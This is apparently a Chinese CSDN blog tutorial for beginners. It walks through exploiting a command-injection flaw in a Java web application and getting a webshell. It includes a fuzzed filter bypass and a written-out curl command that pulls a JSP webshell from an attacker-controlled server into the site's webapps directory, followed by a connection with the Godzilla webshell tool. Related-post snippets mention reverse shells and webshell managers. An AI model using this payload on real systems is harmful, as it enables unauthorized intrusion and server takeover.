从命令执行到GetShell,适合新手学习

最新推荐文章于 2022-10-09 12:17:29 发布
最新推荐文章于 2022-10-09 12:17:29 发布
阅读量1.2k 收藏 2
点赞数 2
文章标签: 安全 web安全 安全架构 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali_Ma/article/details/119984443
版权

最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。
image.png

从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。

接着来找一下这个方法的调用链,
image.png

可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。

然后找一下这个jdk参数是否是我们可控的,
image.png

上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。
image.png

执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。
image.png

最终经过多次FUZZ尝试发现在命令后面加上%20aa就可以正常执行命令了,尝试直接echo写shell没成功,使用下载文件的方式getshell。

搭建一个http服务,添加一句话木马文件
image.png

执行下面的命令进行getshell

curl%20-o%20../../webapps/xxxxx/xx.jsp%20http://xx.xx.xx.xx/hoo.jsp%20aa

image.png

使用哥斯拉进行连接
image.png

2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册。必备工具包)戳我拿

kali_Ma
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
从无回显命令执行到getshell的渗透测试
Javachichi的博客
06-02 786
事情起源于一次渗透测试,机缘巧合之下,发现了一个PHP imap远程命令执行的漏洞点。但尴尬的是,这块命令执行并不会有回显,由此开始了今天的探测之旅。
网站渗透总结之Getshell用法大全
最新发布
LinkSLA的博客
11-07 2365
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
shell顺序执行
The_perfect_world的博客
01-14 924
  如果只是简单的需要执行多个命令,只需要在多条命令之间加上命令分隔符即可,如下:(先后打印hello和world)   若后面的命令执行需要依赖于前面的命令成功执行,则可以使用&&符号,如下:(删除一个不存在的文件,然后创建一个新文件)   若后面的命令执行需要依赖于前面命令的错误执行,则可以使用||符号,如下:(创建一个文件,删除,第一次删除成功,&&后面的...
shell脚本顺序执行和并发执行
chuang504321176的博客
03-13 817
https://blog.csdn.net/wangzhufei/article/details/87932048 Shell-使用&和wait让你的脚本并行执行 https://artisan.blog.csdn.net/article/details/87691890
【后门工具】哥斯拉,YYDS#
10-09 1432
【哥斯拉】生成、检测、连接木马,绝活
轻松使用“Explain Shell”脚本来理解 Shell 命令
08-01
通过"Explain Shell"脚本,用户可以更轻松地理解复杂的Shell命令,从而提高工作效率,降低学习曲线,尤其适合Linux新手。这个脚本利用网络资源,为用户提供简洁明了的命令解释,是学习和使用Linux命令行环境的一个...
学习LINUX命令
03-20
在IT领域,Linux操作系统...通过深入学习并实践这些命令,初学者可以逐步提升自己的Linux技能,从新手变为入门者。记住,实践是掌握任何技术的最好方法,不断在终端尝试并理解每个命令的作用,是成为Linux高手的关键。
wrapt:apt的简单包装,将所有有用的apt命令合并到一个易于使用的脚本中
02-06
它旨在简化对`apt`命令的使用,通过将常见的`apt-get`, `apt-cache`, `apt-update`, `apt-upgrade`等命令整合到一个脚本中,使系统维护变得更加便捷。这个工具特别适合那些不熟悉或不想频繁输入复杂命令行的用户。 ...
windows和linux命令大全
12-29
Windows命令通常较为直观,适合新手入门;而Linux命令则更注重效率和可编程性,对于开发者和系统管理员来说尤其重要。理解并熟练运用这些命令,将极大地提高工作效率,使你在IT领域更加游刃有余。
ssh整合适合新手
06-06
8. **SSH通道**:SSH可以创建两种通道,Shell通道用于执行命令,SFTP通道用于文件传输。在Spring中,可以通过建立Session并创建相应通道对象来实现。 9. **安全管理**:定期更换SSH密钥,限制无效尝试次数,使用...
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
后台getshell常用技巧
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
oracleshell执行新医保数据转换后台
viviliving的专栏
03-20 242
select LinxRUNCMD('/data05/sql/exec.sh /data05/sql/test.sql') cmd from dual; exec.sh #!/usr/bin/bash source ~/.bash_profile echo $1 date>$1.log /usr/bin/nohup /u01/app/oracle/product/12.1.0/db_1/bin/sqlplus hsa_lzjbsi/hsa_lzjbsi@192.168.217.192/OR.
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 5345
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7114
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell命令:msfvenom -p windows/meterpreter...
WINDOWS命令行关闭本地占用的端口
weixin_45588247的博客
07-30 513
一、原因:   由于本地安装了两个版本的phpstudy,一个是phpstudy2013,一个是phpstudy2018,phpstudy2013是开机默认启动的,要使用phpstudy2018时提示80端口被占用。 二、解决步骤: 1、查找对应的端口占用的进程: 命令: # 查找占用80端口对应的程序的PID号: netstat -aon | findstr "80" 2、根据PID号找到对应的程序: 命令: # 根据PID号找到对应的程序名: tasklist | findstr "PID号"
学习笔记】利用web漏洞来getshell
chualam的博客
10-29 391
nmap命令扫码 nmap ip -p端口 -sP -sV --version-all rsync未授权访问(端口873) rsync (--port=端口) ip:: //看看有什么文件 rsync (--port=端口) ip::file //进入文件 rsync (--port=端口) ip::file/.exe /下载本地目录 下载到本地 rsync (--port=端口) 本地文件地址 ip::file //上传文件,这时上传ssh公钥 ssh root@ip 进行链接 rm 文件地址 //删..
记一次Shiro实战(目标不出网)
一直在水些技术小文
04-29 1424
1. 在一次渗透测试项目中,检测出了目标系统存在shiro漏洞也可以进行远程命令执行,但是反弹不了shell,原因可能是目标服务器不出网。所以我们得通过shiro漏洞进行写webshell。漏洞所在位置如下。工具还是使用Shiro550/721漏洞检测工具进行写入webshell,那有几个问题 工具下载地址:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51 1.在工具的哪个地方上传木马 2.如何找上传的路径 3
哥斯拉-webshell管理工具
nex1less的博客
08-21 1万+
0x01 工具由来 **期间,各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具,名为“哥斯拉”。 0x02 工具介绍和使用 请点这 0x03 工具下载 请点这 如何加速下载github上的文件? 请点这(需要能访问谷歌商店) 0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值